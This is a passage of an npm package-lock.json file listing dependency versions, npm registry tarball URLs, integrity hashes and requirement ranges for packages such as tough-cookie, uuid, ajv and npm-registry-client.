"sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, "engines": { "node": ">=8" } }, "node_modules/supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "engines": { "node": ">= 0.4" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": 
"sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "dependencies": { "psl": "^1.1.28", "punycode": "^2.1.1" }, "engines": { "node": ">=0.8" } }, "node_modules/tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "dependencies": { "safe-buffer": "^5.0.1" }, "engines": { "node": "*" } }, "node_modules/tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "node_modules/uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "dependencies": { "punycode": "^2.1.0" } }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "node_modules/uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. 
See https://v8.dev/blog/math-random for details.", "bin": { "uuid": "bin/uuid" } }, "node_modules/validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "node_modules/verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "engines": [ "node >=0.6.0" ], "dependencies": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" } }, "node_modules/verror/node_modules/core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" }, "node_modules/wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } }, "dependencies": { "ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "requires": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" } }, 
"ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true }, "aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true }, "asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "requires": { "safer-buffer": "~2.1.0" } }, "assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" }, "aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", 
"integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "requires": { "tweetnacl": "^0.14.3" } }, "brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "requires": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { "delayed-stream": "~1.0.0" } }, "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "concat-stream": { "version": "1.6.1", "resolved": 
"https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "requires": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "requires": { "assert-plus": "^1.0.0" } }, "delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" }, "ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "requires": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": 
"sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" }, "form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "requires": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" } }, "fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, "gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": 
"sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "requires": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" } }, "getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "requires": { "assert-plus": "^1.0.0" } }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" } }, "graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "requires": { "natives": "^1.1.3" } }, "har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" }, "har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "requires": { "ajv": "^6.12.3", "har-schema": "^2.0.0" } }, "has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": 
true }, "hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "requires": { "function-bind": "^1.1.2" } }, "hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "requires": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" } }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "requires": { "once": "^1.3.0", "wrappy": "1" } }, "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "requires": { "hasown": "^2.0.0" } }, "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true }, "is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", 
"integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" } }, "mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": 
"sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" }, "mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "requires": { "mime-db": "1.52.0" } }, "minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "requires": { "brace-expansion": "^1.1.7" } }, "minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==" }, "mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "requires": { "minimist": "^1.2.6" } }, "natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==" }, "normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "requires": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "requires": { "hosted-git-info": 
"^1.5.3", "semver": "4" }, "dependencies": { "hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" } } }, "npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "requires": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "npmlog": "", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" } }, "npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "requires": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" } }, "oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "requires": { "wrappy": "1" } }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" }, "path-parse": { "version": "1.0.7", "resolved": 
